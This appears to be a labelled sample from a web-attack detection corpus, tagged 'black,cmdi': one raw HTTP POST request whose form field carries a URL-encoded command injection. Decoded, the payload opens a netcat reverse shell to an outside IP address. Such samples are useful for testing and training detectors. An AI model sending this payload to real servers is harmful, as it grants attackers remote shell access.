# tag: black,cmdi
POST / HTTP/1.1
Host: 1.2.3.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Length: 150
Content-Type: application/x-www-form-urlencoded

k5g6b=%3Bmkfifo%09%2Ftmp%2Fs0%3Bnc%09-w%095%0945.148.10.50%0931331%3C%2Ftmp%2Fs0%7C%2Fbin%2Fsh%3E%2Ftmp%2Fs0+2%3E%2Ftmp%2Fs0%3Brm+%2Ftmp%2Fs0%3B%5C+
